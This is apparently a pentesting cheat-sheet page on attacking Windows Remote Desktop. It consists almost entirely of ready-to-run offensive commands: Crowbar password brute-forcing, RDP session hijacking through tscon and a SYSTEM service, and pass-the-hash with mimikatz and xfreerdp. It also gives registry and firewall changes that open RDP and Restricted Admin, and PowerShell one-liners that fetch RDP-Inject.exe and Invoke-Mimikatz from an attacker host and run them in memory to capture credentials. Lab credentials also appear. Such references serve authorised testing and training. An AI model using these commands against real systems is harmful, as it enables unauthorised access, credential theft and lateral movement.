Pentesting RDP

CROWBAR

Remote desktop protocol with Crowbar
- Crowbar is a network authentication cracking tool

sudo apt install crowbar

Make a suitable wordlist
Attempt to bruteforce RDP

crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlist/rockyou.txt -n 1 -v 
# -b protocol # -s target server 
# -n number of threads (RDP doesnt reliably handle multiple threads)

If errors are encountered like: File Not Found, convert the wordlist to UTF-8

iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt

RDP Session Hijacking

Must have SYSTEM privs

query user

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} 
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" 
net start sessionhijack

SHARP RDP

SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab

RDP Thief

rdpthief.dll must be on the local machine
Modify C# source with the location of the hidden RDPThief.dll on disk
C# RDP-Inject.exe runs in a while loop and injects into each RDP process in order to capture credentials from RDP
Dump captured credentials

type C:\Users\User\AppData\Local\Temp\3\data.bin

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))

The above command pulls RDP-Thief from a remote webserver and loads it via powershell reflection. Ensure you update the arguments in the above command

Screenshot the Desktop

You can take a screenshot of the desktop if NLA is disabled
with netexec

--nla-screenshot
--screenshot
--screentime SCREENTIME

Resolution with WxH Default 1024x768

--res RES

Enable RDP via Crackmapexec

crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp --options 
crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable

Enable RDP via Registry

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow

Enable RDP access for user

net localgroup "Remote Desktop Users" joe /add

Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice'

Remove Remote Desktop Access for user

Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza

If PTH is Disabled

Enable Restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

RDesktop

RDESKTOP

rdesktop 10.11.1.13 -u xxx -p xxx rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!'

Mount folders using RDesktop

rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools'

XFreeRDP

xfreerdp /v:$host /u:administrator /cert:ignore xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore

All security certificates should be ignored

xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo

Mount a folder on our attacker machine to the target machine

mkdir /tmp/filetransfer
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools

# ERROR: If you encounter the below error add the below switch
`[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED`
/tls-seclevel:0

Some other xfreerdp commands with options that have been helpful in the past

xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50
xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

Pass The Hash RDP

xfreerdp /u:domain\username /pth: /v:$host

If PTH is disabled, enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

PTH RDP From a Windows machine

sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin"

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"'

Nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security Check

sudo cpan 
install Encoding::BER 
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check 
./rdp-sec-check.pl $host

PreviousVulnerability Scanning NextIIS Short name scanning

Last updated 3 months ago

hashtagCROWBAR

hashtagRDP Session Hijacking

hashtagSHARP RDP

hashtagRDP Thief

hashtagScreenshot the Desktop

hashtagEnable RDP via Crackmapexec

hashtagEnable RDP via Registry

hashtagEnable RDP access for user

hashtagRemove Remote Desktop Access for user

hashtagIf PTH is Disabled

hashtagRDesktop

hashtagRDESKTOP

hashtagXFreeRDP

hashtagPass The Hash RDP

hashtagPTH RDP From a Windows machine

hashtagNmap

hashtagRDP Security Check

CROWBAR

RDP Session Hijacking

SHARP RDP

RDP Thief

Screenshot the Desktop

Enable RDP via Crackmapexec

Enable RDP via Registry

Enable RDP access for user

Remove Remote Desktop Access for user

If PTH is Disabled

RDesktop

RDESKTOP

XFreeRDP

Pass The Hash RDP

PTH RDP From a Windows machine

Nmap

RDP Security Check